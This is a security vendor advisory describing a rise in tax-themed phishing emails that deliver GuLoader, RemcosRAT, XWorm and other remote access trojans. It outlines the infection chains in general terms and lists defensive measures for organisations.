Increase in Tax-Themed Email Lure

THE THREAT

As the U.S. and Canadian tax season approaches, eSentire has observed a substantial increase in malware being delivered through tax-themed phishing emails. Cybercriminals are exploiting the urgency and importance of tax-related communications to trick individuals into opening malicious email links, leading to malware infections.

The observed phishing campaigns utilize tax-themed lures, including tax documents, tax returns, and IRS letters. These emails often appear to be sent from legitimate tax authorities or financial institutions and include malicious links leading to malware payloads hosted on attacker-controlled infrastructure.

eSentire has observed the following malware families being delivered from tax-themed campaigns: GuLoader (which in turn loads RemcosRAT), XWorm, RattyRat, and SorillusRAT. These malware families provide threat actors with a variety of functionalities including keylogging, taking screenshots, audio and webcam recording, file transfer, and remote code execution.

With the increasing sophistication of tax-themed phishing campaigns, it is crucial organizations implement proactive email security measures, as well as educate users to minimize the risk of malware infections and protect sensitive information, during the tax season and throughout the calendar year.

What we’re doing about it

• eSentire MDR for Network has rules in place to identify GuLoader, RemcosRAT, XWorm, RattyRat, and SorillusRAT
• eSentire MDR for Endpoint has a wide array of rules in place to detect malicious activity associated with these threats
• BlueSteel, via eSentire MDR for Endpoint, identifies malicious PowerShell activity
• Known malicious IP addresses are blocked via the eSentire Global Block list
• eSentire’s Threat Response Unit released a TRU Positive blog detailing the Ratty RAT and Sorillus RAT infections
• The eSentire Threat Intelligence team is actively tracking related threats for additional details and detection opportunities

What you should do about it

• Individuals and organizations should be vigilant when receiving unsolicited emails or messages related to taxes
  • Train users to identify and report potentially malicious content using Phishing and Security Awareness Training (PSAT) programs
  • Review the example of a malicious email included below (Figure 1)
• Protect endpoints against malware by:
  • Ensuring antivirus signatures are up-to-date
  • Using a Next-Gen AV (NGAV) or Endpoint Detection and Response (EDR) tool to detect and contain threats
• If not required for a business function, block password-protected zip archives at the email boundary 
• If not required for a business function, block .jar file attachments in email and block emails with .jar in URLs
• Consider removing Java on systems where it is not required
• Consider creating a new “Open With” parameters for .jar files so they open with notepad.exe
  • This setting is found in the Group Policy Management Console under User Configuration > Preferences > Control Panel Settings > Folder Options
  • Applying this to other script files (.js, .jse, .hta, .vbs) is also recommended for most users to limit the risk of click-to-execute content
• Enforce the use of Multi-Factor Authentication (MFA) to limit the value of stolen credentials

Additional information

GuLoader is a sophisticated malware loader which has heavily abused tax-themed lures in 2023. eSentire’s Threat Response Unit reported on GuLoader around tax season last year in both April and June of 2023. Starting in early March 2024, eSentire has observed an increase in GuLoader incidents resulting in the deployment of the RemcosRAT malware. In observed incidents, users received tax-themed malicious emails which contain a link to a password protected ZIP archive that impersonates a tax return (Figure 1). The ZIP archive contains an LNK file, which if interacted with, leads to the deployment of GuLoader. GuLoader is then launched resulting in the execution of PowerShell commands, establishing persistence via Registry Run Keys, and ultimately the RemcosRAT payload is injected into the memory of a legitimate process (Figure 2). If not detected and remediated quickly, these incidents will lead to information theft and enable remote control over the victim device.

RemcosRAT, XWorm, RattyRat, and SorillusRAT are all Remote Access Trojans offering various information stealing and remote access capabilities, including keylogging, capturing screenshots, recording audio, transferring files, and remotely controlling target machines.

In a recently observed incident involving XWorm malware, a user was identified downloading a malicious JavaScript file, which was impersonating a tax document; the user was directed to the download page via a malicious email. Upon execution, a PowerShell command was spawned to retrieve the XWorm payload from its Command-and-Control (C2) server. Subsequent JavaScript and PowerShell commands were blocked, via the client’s Endpoint agent, preventing malicious actions from occurring (Figure 3).

For additional technical details relating to recent observations of Ratty Rat and Sorillus RAT, delivered via tax-related lures, see the eSentire TRU Positive blog post Beware the Bait: Java RATs Lurking in Tax Scam Emails, published on February 26^th, 2024.

https://www.esentire.com/security-advisories/increase-in-tax-themed-email-lure